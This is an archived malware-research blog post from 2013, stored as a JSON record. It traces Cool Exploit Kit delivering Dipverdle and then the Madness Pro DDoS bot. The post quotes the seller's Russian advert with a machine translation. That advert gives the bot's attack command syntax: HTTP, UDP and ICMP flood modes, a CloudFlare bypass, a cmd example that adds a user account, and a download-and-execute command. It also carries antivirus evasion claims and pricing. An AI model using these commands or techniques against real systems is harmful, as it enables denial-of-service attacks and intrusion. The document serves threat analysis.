{
	"id": "90a62981-a291-4e11-ab78-fc4ad88fccd2",
	"created_at": "2026-04-06T00:10:49.300562Z",
	"updated_at": "2026-04-10T03:22:02.731895Z",
	"deleted_at": null,
	"sha1_hash": "18d90c938eaa53aefecbedc0e81e1e50760fe4c5",
	"title": "Meet Madness Pro or Few days rise of a Ddos Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127387,
	"plain_text": "Meet Madness Pro or Few days rise of a Ddos Botnet\r\nArchived: 2026-04-05 14:44:58 UTC\r\n2013-10-14 - Connect the dots\r\nAt begining of September I landed on a new instance of Cool Exploit Kit : /paper/\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 1 of 19\n\nCool EK pushing Dipverdle which then call Home and  gather\r\nMadness ( sometimes no analysis needed ;)  ) ddos bot\r\nDipverdle (MS name) was new to me. I spent time studying the server and I have the feeling that the C\u0026C side is\r\na fork of a Ransomware C\u0026C. ( Supposition : the global picture makes me think Dipverdle could be tied to\r\nFretLine the Author of MultiLocker then MultiBotnet)\r\nDipverdle : 01a08386464149fab0c05e24dc4b64ad\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1)\r\nMadness : 3e4107ccf956e2fc7af171adf3c18f0a\r\nSamples here (Owncloud via goo.gl)\r\nThe Dipverdle C\u0026C rely on a Sqlite Database.\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 2 of 19\n\nDipberdle C\u0026C Db Structure\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 3 of 19\n\nDipverdle DB with some content\r\nFeeding Splunk with this database :\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 4 of 19\n\n16 000 C\u0026C 1st call in (choosen) 4 days\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 5 of 19\n\nDipverdle C\u0026C  1st Call in (choosen) 4 days\r\nThe Madness C\u0026C :\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 6 of 19\n\nMadness C\u0026C Login Screen\r\nThis was really familiar...\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 7 of 19\n\nDarkness (Optima) C\u0026C Login Screen - 2012-06-23\r\nSee : A peek inside the Darkness (Optima) DDoS Bot - Dancho Danchev - 2012-03-08\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 8 of 19\n\nScreenshot of the Advert\r\nOriginal Text :\r\n------------------------------------------\r\nMadness PRO\r\nДата релиза: 01.09.2013\r\nИстория создания:\r\nЛетом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования\r\nсобственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не\r\nзаслужила даже оценки \"4\". \r\nТестируемые семплы во время работы пожирали память, загружали процессор локальной машины,\r\nвылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали\r\nсрабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.\r\nДля создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг),\r\nDirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код,\r\nприобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих\r\nоколотемных программ. \r\nВозможности\r\n- написан на C++, легко криптуется, имеет малый вес (сжатый семпл \u003c 15кб)\r\n- полная совместимость со всеми Windows семейства NT (x86 и x64)\r\n- Бот имеет 7 типов атак \r\n- стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.\r\n- Не привлекает внимание UAC и Windows Firewall\r\n- умеет устанавливать port, referal и cookies индивидуально для каждой цели \r\n- поддерживает до 10-ти целей одновременно\r\n- имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 9 of 19\n\nаналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней\r\nработой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые\r\nпараметры: адрес, порт, реферал и т.д.) \r\n- имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет\r\nпрямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании\r\nWinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому\r\nпоказателю) конкурентов.\r\n- в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.\r\n- поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.\r\n- поддерживает Slow GET и Slow POST режимы!\r\n- в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на\r\nсервер.\r\n- защита диалога бот-панель спецключем\r\nДетектирование:\r\nпри проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA,\r\nClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили\r\nфайл в 100% случаев.\r\nлинк на результат: m.exe - Антивирусный сканер Jotti\r\nРежимы атаки и команды\r\nТак как система является профессиональной синтаксис комманд давольно сложен, но только на первый\r\nвзгляд =) Синтаксис команд обратносовместим с системой Darkness.\r\ndd1 Основной режим работы по HTTP протоколу методом GET, используя соккеты. Поддерживает\r\n***cookies и $$$ref и допускает до 10 целей одновременно (разделитель \";\"). Самая быстрая по количеству\r\nзапросов атака. Пример: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2\r\ndd2 Тот же режим, что и dd1, только метод POST. Добавляется обязательный параметр @@@post_data. Так\r\nже поддерживается до 10-ти целей. Пример:\r\ndd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy\u0026password =hhh, эта команда запостит\r\nлогин yyy и пароль hhh на скрипт Зенон Н.С.П. - платный хостинг сайтов, качественный хостинг PHP,\r\nMySQL и Perl. Выбирайте виртуальный хостинг по доступным ценам. Большой выбор та\r\ndd3 атака по HTTP методом GET используя системную библиотеку WinInet.dll. Старая-добрая атака,\r\nиспользуемая в многих Delphi ботах. Медленная из-за ограничений десктопных Windows. Не\r\nподдерживает реферал и куки, поддерживает до 10 целей. Пример: dd3=http://host.com/script.php\r\ndd4 атака по HTTP методом POST используя системную библиотеку WinInet. То же что и dd3, только POST.\r\nПример:\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 10 of 19\n\ndd4=http://host.com/script.php@@@@@@login=yyy\u0026password=hhh\r\ndd5 ICMP атака (пинги). Поддерживается до 10 целей. Пример dd5=198.168.0.1;199.0.0.1\r\ndd6 UDP атака. Поддерживается до 10 целей. Обязательные параметры: порт и текст. Пример:\r\ndd6=192.168.0.2:27015@@@flud_text\r\ndd7 атака по HTTP методом GET используя системную библиотеку URMON.dll Средняя по скорости атака,\r\nподдерживает до 10 целей и не поддерживает cookies и referal\r\ncfa команда обхода защиты CloudFlare (!). Используется ТОЛЬКО во время работы dd7. Не оставнавливает\r\nвыполнение команды dd7. Суть проста - бот выполняет ява скрипт, получает нужную cookie и CloudFlare\r\nсчитает запросы сделанные dd7 авторизованными. Пример: dd7=http://site.ru/index.php, затем (через\r\nполторы минуты) cfa=http://site.ru/index.php\r\ncmd команда выполняется в коммандном интерпритаторе cmd.exe на локальной машине. Не останавливает\r\nвыполнение других команд. Пример: cmd=net user goodwin /add\r\nexe команда на загрузку и выполнение EXE файла. Не останавливает выполнение других команд. Файл\r\nсохраняется под тем же именем, под которым он был в интернете. Производится 3 попытки скачать файл.\r\nПример: exe=http://site.com/filename.exe\r\nПанель управления:\r\nМы использовали измененную на ~70% ПУ от другого комплекса (приобретенную по договору на\r\nизменение и перепродажу), переписав ее практически полностью, так как было обнаружено слишком\r\nмного ошибок и код не понравился. Естественно все было исправлено и оптимизировано - новая ПУ Вам\r\nпонравится!\r\nСкриншоты:\r\n:screenshot: Скриншот|Screenshot (login screen)\r\n:screenshot: Скриншот|Screenshot (see english translation)\r\nДемонстрация:\r\nТак-как система очень мощная и для демонстрации возможностей нужно всего 15-20 ботов, которые всегда\r\nв наличии - селлеры постараются продемонстрировать мощность.\r\nЦены:\r\n- тестовая лицензия $0 (только для проверяющих на форумах и тестеров. обновления не предусмотрены)\r\n- базовая лицензия $500 (обновление/ребилд $50, обновление на новую версию $100, цена на модули будет\r\nустановлена позже)\r\n- полная лицензия $950 (все обновления, ребилды и модули бесплатны)\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 11 of 19\n\nСкидки:\r\n- 30% для владельцев GBot/Andromeda/Dirt Dumper, базовой лицензии iBot, базовой/серебряной лицензии\r\nDarkness\r\n- 50% для владельцев золотой и бриллиантовой лицензии Darkness/iBot\r\n- 20% дополнительно для тех, кто приобретал указанные выше продукты не более недели назад.\r\nОплата\r\nк оплате принимаются ЯД, WMR/WMZ/WMB, PM и LR. А так же любая валюта через обменник.\r\nГарантии:\r\nГотовность работать через гаранта любого, известного форума.\r\nРассрочка\r\nДля имеющих репутацию и/или аттестаты людей предусмотрена система рассрочки. Обсуждается\r\nиндивидуально.\r\nКонтакты\r\n- селлер 1 ICQ: 902300\r\n- селлер 2 ICQ: 903400\r\n- руководитель проекта ICQ: 395891570\r\nГотов пройти проверку на условиях администрации форума.\r\n------------------------------------------\r\nTranslated by google as :\r\n------------------------------------------\r\nMadness PRO\r\nRelease Date: 01.09.2013\r\nThe history of creation :\r\nIn the summer of 2012 we started thinking about creating a fundamentally new DDoS - bot to test their own web\r\nresources on the fault-tolerance, since none of the systems tested did not deserve to even estimate \"4\".\r\nThe test samples during devoured memory load on the CPU local machine flew with errors, freezes on 50 %\r\ncapacity CPU, making wrong entries in the registry , causing activation of protective systems , many weighty\r\nerror was found in the control panels .\r\nTo create your own system, we have studied in detail : BlackEnergy ( source code ), gbot ( disassembling ),\r\nDirtJumper ( disassembling ), Darkness Optima ( source code , purchased under the contract ), iBot ( source code ,\r\npurchased under the contract ), w3Bot ( source) , were also studied the source code of Zeus and many\r\nokolotemnyh programs.\r\ncapabilities\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 12 of 19\n\n- Written in C + +, easily crypt is lightweight (compressed sample \u003c 15KB )\r\n- Full compatibility with all Windows family of NT (x86 and x64)\r\n- Boat has 7 types of attacks\r\n- Stability in the system. Indicators load on the CPU and RAM are very uniform .\r\n- Do not attracted the attention of UAC and Windows Firewall\r\n- Able to establish port, referal and cookies individually for each goal\r\n- Supports up to 10 targets simultaneously\r\n- Has a very low load on the CPU with the new , complex system of parsing commands ( all analogs parsing takes\r\nplace inside a function in multiple threads - it's extra work load on the processor . New bot enters all data in the\r\narray before the attack on the function and come ready options address, port , referral , etc.)\r\n- Has an enormous power output of more than 1500 http ( and more 30000 UDP) queries per minute through\r\ndirect interaction with the network drivers , even on desktop Windows! (only using WinSock) is about 10 times\r\nmore than some few analogs and more top ( on this parameter ) competitors.\r\n- In the control panel are : the number of requests per minute , right in the system , the version of the system.\r\n- Supports bypass CloudFlare protection ( !) And many other more common .\r\n- Supports Slow GET and Slow POST modes !\r\n- In the packet header specifies disabling the cache (Cache-Control: no-cache), which increases the load on the\r\nserver .\r\n- The protection of dialogue bot panel spetsklyuchem\r\nDetection:\r\nchecking build (without crypt and packaging ), only 3 out of all the anti-virus gave a suspicion (AVIRA, ClamAV,\r\nVBA32). During the test key local AV : Kaspersky, Nod32, DrWeb, Avast missed a file in 100 % of cases.\r\nLink Result : m.exe - Virus scanner Jotti\r\nModes of attack and the team\r\nSince the system is a professional syntax commands davolno complex, but only at first sight = ) Command Syntax\r\nobratnosovmestim with the Darkness.\r\ndd1 basic mode of operation via HTTP protocol using GET, using sokkety . Supports *** cookies and $ $ $ ref\r\nand allows for up to 10 targets simultaneously (separated by \" ;\") . The fastest search volume attack . Example :\r\ndd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2\r\ndd2 same treatment as dd1, only the method POST. Added optional parameter @ @ @ post_data. It is also support\r\nfor up to 10 targets. Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy \u0026\r\npassword = hhh, this team posted a username and password yyy hhh on the script Zenon NSP - Paid web hosting ,\r\nquality hosting PHP, MySQL and Perl. Choose a shared hosting at affordable prices. Great choice that\r\ndd3 attack on the HTTP GET method using a system library WinInet.dll. Good old attack that is used in many\r\nDelphi bots . Slow due to the limitations of desktop Windows. Does not support the referral and cookies , supports\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 13 of 19\n\nup to 10 targets . Example : dd3 = http://host.com/script.php\r\ndd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:\r\ndd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy \u0026 password = hhh\r\ndd5 ICMP attack ( pings ) . Supports up to 10 targets . Example dd5 = 198.168.0.1; 199.0.0.1\r\ndd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text. Example : dd6 =\r\n192.168.0.2:27015 @ @ @ flud_text\r\ndd7 attack on the HTTP GET method using a system library URMON.dll average speed attack that supports up to\r\n10 targets and do not support cookies and referal\r\ncfa command to bypass the protection CloudFlare (!). ONLY used during dd7. Not ostavnavlivaet the command\r\ndd7. The point is simple - the bot executes java script gets the desired cookie and believes CloudFlare requests\r\nmade by authorized dd7 . Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa =\r\nhttp://site.ru/index.php\r\ncmd command is executed on the command interpreter cmd.exe on the local machine . Does not stop the\r\nexecution of other commands. Example : cmd = net user goodwin / add\r\nexe command to load and run the EXE file. Does not stop the execution of other commands. The file is saved\r\nunder the same name, under which he had been on the internet. Made three attempts to download the file .\r\nExample : exe = http://site.com/filename.exe\r\nControl Panel :\r\nWe used a modified ~ 70 % PU from another set (purchased under a contract for change and resale ) by rewriting\r\nit almost completely, as it was found too many mistakes and did not like the code . Of course everything was\r\ncorrected and optimized - New PU Enjoy !\r\nScreenshots:\r\n: screenshot: Screenshot | Screenshot (login screen)\r\n: screenshot: Screenshot | Screenshot\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 14 of 19\n\nDemo:\r\nSo, as the system is very powerful , and to demonstrate the need to only 15-20 boats that are always available -\r\nSellers will try to demonstrate the power .\r\nprices:\r\n- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )\r\n- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be\r\ninstalled later)\r\n- $ 950 full license ( all upgrades, rebuilds and modules are free)\r\ndiscounts:\r\n- 30% for the owners GBot / Andromeda / Dirt Dumper, basic license iBot, base / silver license Darkness\r\n- 50 % for holders of gold and diamond license Darkness / iBot\r\n- 20 % extra for those who acquired the products listed above are not more than a week ago.\r\npayment\r\nto accept POISON , WMR / WMZ / WMB, PM and LR. And as any currency through an exchanger.\r\nWarranties :\r\nWillingness to work through the guarantor of any known forum.\r\ninstallment plan\r\nIn order to have a reputation and / or certificates of a system for people installments. Discussed individually.\r\nContacts\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 15 of 19\n\n- Celler 1 ICQ: 902300\r\n- Celler 2 ICQ: 903400\r\n- Project Manager ICQ: 395891570\r\nReady to be tested under the administration of the forum.\r\n------------------------------------------\r\nThen he replied about  CloudFlare protection :\r\n------------------------------------------\r\nОбход защиты CloudFlare.\r\nЗащитный комплекс CloudFlare базируется на определении браузера за счет выполнения в нем Java\r\nскрипта, после чего клиенту выдается уникальная cookies. \r\nБот, как и браузер, теоретически может выполнить Java скрипт. Огромная сложность в том, чтобы\r\nуместить необходимый объем математических функций в скромный размер билда бота, однако некоторые\r\nэкземпляры с поставленое задачей справляются!\r\nРассмотрим пример тестирования сервера http://server.com, защищенного CloudFlare с помощью комплекса\r\nс++ Madness 1.08:\r\n1) Ботнету отдается команда dd7=http://server.com, после чего начинаются реквесты на сервер с помощью\r\nсистемной библиотеки UrlMon. Как видно по логам сервера и сниферу, ботам возвращается ошибка 302,\r\nчто означает работу защиты.\r\n2) Ботнету отдается команда cga=http://server.com и боты запрашивают cookies для авторизации. Выполнив\r\nJava скрипт каждый бот получает уникальную (для его ip и useragent) cookie которую тут же включает в\r\nзаголовок пакета. По логам видно что запросы на сервер проходят в нормальном режиме и возвращаемый\r\nконтент соответствует контенту вебсайта на нем! \r\nQ) Почему нельзя сделать это автоматически?\r\nA) В зависимости от настроек защиты cookie может изменяться в произвольном интервале и авторизацию\r\nнужно проходить вновь. Пока что автоматика не справляется с этим так, как этого делает человек-профессионал. Слишком частый интервал проверки сильно ухудшает юзабилити сайта, т.к. обычные\r\nпользователи видят качели CloudFlare каждый Божий секунд.\r\nQ) Можно ли использовать этот метод постоянно, для любых целей?\r\nA) Можно, но не рекомендуется. Т.к. dd7 сама по себе более медленная атака в сравнении с dd1, а тут еще\r\nнагрузка увеличивается из-за составления спецпакета обхода защиты.\r\nНовости проекта\r\nС сегодняшнего дня с нами работает еще один селлер отдела продаж: iSupport (709186)\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 16 of 19\n\nICQ: 902300, 903400, 709186\r\nJAB: damrai13@jabber.ru\r\n------------------------------------------\r\nTranslated by google as :\r\n------------------------------------------\r\nProtection bypass CloudFlare.\r\nCloudFlare security complex is based on the determination of the browser by running Java script in it , after which\r\nthe client is issued a unique cookies.\r\nBoth, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount of\r\nmathematical functions in the modest size of the build bot , however, some instances of coping with the task !\r\nConsider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:\r\n1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library\r\nUrlMon. As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .\r\n2) A botnet command is given cga = http://server.com cookies and bots request for authorization. Java script\r\nexecuting each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header .\r\nAccording to the logs can be seen that the requests to the server are in normal mode and returns the content of the\r\nwebsite corresponds to the content on it!\r\nQ) Why can not I do it automatically?\r\nA) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go\r\nagain . So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection\r\ninterval greatly reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.\r\nQ) Can I use this method all the time, for any purpose ?\r\nA) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the\r\nload is increased due to the preparation of the special package to bypass the protection .\r\nNews of the project\r\nFrom today, we are working with another Celler Sales: iSupport (709186)\r\nICQ: 902300, 903400, 709186\r\nJAB: damrai13@jabber.ru\r\n------------------------------------------\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 17 of 19\n\nMadness C\u0026C\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 18 of 19\n\nBotnet Operator testing his baby.\r\nThanks to Arbor Networks ASERT Threat Intelligence for additional info.\r\nSource: https://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nhttps://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html"
	],
	"report_names": [
		"meet-madness-pro-or-few-days-rise-of.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434249,
	"ts_updated_at": 1775791322,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18d90c938eaa53aefecbedc0e81e1e50760fe4c5.pdf",
		"text": "https://archive.orkl.eu/18d90c938eaa53aefecbedc0e81e1e50760fe4c5.txt",
		"img": "https://archive.orkl.eu/18d90c938eaa53aefecbedc0e81e1e50760fe4c5.jpg"
	}
}